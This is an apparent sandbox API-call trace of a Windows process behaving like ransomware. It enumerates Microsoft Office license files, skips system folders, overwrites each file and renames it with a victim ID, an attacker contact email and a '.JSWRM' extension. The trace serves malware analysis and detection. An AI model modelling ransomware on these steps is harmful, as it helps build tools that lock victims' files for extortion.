[0106.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5200) returned 0x24c1d0 [0106.853] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5200, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5200, lpOverlapped=0x0) returned 1 [0106.858] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.858] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5200, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5200, lpOverlapped=0x0) returned 1 [0106.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.858] CloseHandle (hObject=0x45c) returned 1 [0106.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0106.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0106.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0106.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0106.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.859] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0106.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0106.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0106.859] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0106.859] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.859] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_oem_perp-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_OEM_Perp-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_oem_perp-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0106.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0106.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0106.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0106.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0106.860] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe80fb2be, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe80fb2be, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe82c4f18, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d4d, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PersonalR_OEM_Perp-ul-oob.xrm-ms", cAlternateFileName="PE5888~1.XRM")) returned 1 [0106.860] lstrcmpiW (lpString1="PersonalR_OEM_Perp-ul-oob.xrm-ms", lpString2=".") returned 1 [0106.860] lstrcmpiW (lpString1="PersonalR_OEM_Perp-ul-oob.xrm-ms", lpString2="..") returned 1 [0106.860] lstrcmpiW (lpString1="PersonalR_OEM_Perp-ul-oob.xrm-ms", lpString2="...") returned 1 [0106.860] lstrcmpiW (lpString1="PersonalR_OEM_Perp-ul-oob.xrm-ms", lpString2="windows") returned -1 [0106.860] lstrcmpiW (lpString1="PersonalR_OEM_Perp-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0106.860] lstrcmpiW (lpString1="PersonalR_OEM_Perp-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0106.860] lstrcmpiW (lpString1="PersonalR_OEM_Perp-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0106.860] lstrcmpiW (lpString1="PersonalR_OEM_Perp-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.860] lstrcmpiW (lpString1="PersonalR_OEM_Perp-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0106.860] lstrcmpiW (lpString1="PersonalR_OEM_Perp-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0106.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7f8 [0106.860] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0106.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.860] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d0a0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalR_OEM_Perp-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0106.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7f8 | out: hHeap=0x1e0000) returned 1 [0106.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0106.860] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0106.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22cdc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalR_OEM_Perp-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0106.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0106.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0106.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0106.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0106.861] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_OEM_Perp-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_oem_perp-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.861] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11597) returned 1 [0106.861] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0106.861] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0106.864] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.864] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0106.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.864] CloseHandle (hObject=0x45c) returned 1 [0106.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0106.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0106.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0106.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0106.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0106.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0106.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0106.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0106.864] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_OEM_Perp-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_oem_perp-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_OEM_Perp-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_oem_perp-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0106.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0106.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0106.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.865] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe84b4db3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe84b4db3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe854d708, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4de6, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PersonalR_OEM_Perp-ul-phn.xrm-ms", cAlternateFileName="PE99F0~1.XRM")) returned 1 [0106.865] lstrcmpiW (lpString1="PersonalR_OEM_Perp-ul-phn.xrm-ms", lpString2=".") returned 1 [0106.865] lstrcmpiW (lpString1="PersonalR_OEM_Perp-ul-phn.xrm-ms", lpString2="..") returned 1 [0106.865] lstrcmpiW (lpString1="PersonalR_OEM_Perp-ul-phn.xrm-ms", lpString2="...") returned 1 [0106.865] lstrcmpiW (lpString1="PersonalR_OEM_Perp-ul-phn.xrm-ms", lpString2="windows") returned -1 [0106.865] lstrcmpiW (lpString1="PersonalR_OEM_Perp-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0106.865] lstrcmpiW (lpString1="PersonalR_OEM_Perp-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0106.865] lstrcmpiW (lpString1="PersonalR_OEM_Perp-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0106.865] lstrcmpiW (lpString1="PersonalR_OEM_Perp-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.865] lstrcmpiW (lpString1="PersonalR_OEM_Perp-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0106.865] lstrcmpiW (lpString1="PersonalR_OEM_Perp-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0106.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0106.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0106.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22cdc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalR_OEM_Perp-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0106.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0106.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0106.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0106.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0106.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d298, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalR_OEM_Perp-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0106.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0106.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0106.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0106.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0106.866] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_OEM_Perp-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_oem_perp-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.866] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19942) returned 1 [0106.866] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4de0) returned 0x24c1d0 [0106.867] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4de0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4de0, lpOverlapped=0x0) returned 1 [0106.869] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.869] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4de0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4de0, lpOverlapped=0x0) returned 1 [0106.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.870] CloseHandle (hObject=0x45c) returned 1 [0106.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0106.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0106.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0106.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0106.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0106.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0106.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0106.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0106.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.870] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_OEM_Perp-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_oem_perp-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_OEM_Perp-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_oem_perp-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0106.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0106.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0106.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0106.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.871] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe848eb48, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe848eb48, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe85274bc, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x298f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PersonalR_Retail-pl.xrm-ms", cAlternateFileName="PE57A2~1.XRM")) returned 1 [0106.871] lstrcmpiW (lpString1="PersonalR_Retail-pl.xrm-ms", lpString2=".") returned 1 [0106.871] lstrcmpiW (lpString1="PersonalR_Retail-pl.xrm-ms", lpString2="..") returned 1 [0106.871] lstrcmpiW (lpString1="PersonalR_Retail-pl.xrm-ms", lpString2="...") returned 1 [0106.871] lstrcmpiW (lpString1="PersonalR_Retail-pl.xrm-ms", lpString2="windows") returned -1 [0106.871] lstrcmpiW (lpString1="PersonalR_Retail-pl.xrm-ms", lpString2="recovery") returned -1 [0106.871] lstrcmpiW (lpString1="PersonalR_Retail-pl.xrm-ms", lpString2="perflogs") returned 1 [0106.871] lstrcmpiW (lpString1="PersonalR_Retail-pl.xrm-ms", lpString2="documents and settings") returned 1 [0106.871] lstrcmpiW (lpString1="PersonalR_Retail-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.871] lstrcmpiW (lpString1="PersonalR_Retail-pl.xrm-ms", lpString2="system volume information") returned -1 [0106.871] lstrcmpiW (lpString1="PersonalR_Retail-pl.xrm-ms", lpString2="msocache") returned 1 [0106.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0106.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_Retail-pl.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0106.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0106.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_Retail-pl.xrm-ms", cchWideChar=26, lpMultiByteStr=0x241268, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0106.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0106.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0106.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_Retail-pl.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0106.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0106.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_Retail-pl.xrm-ms", cchWideChar=26, lpMultiByteStr=0x241038, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0106.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0106.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0106.872] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0106.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, 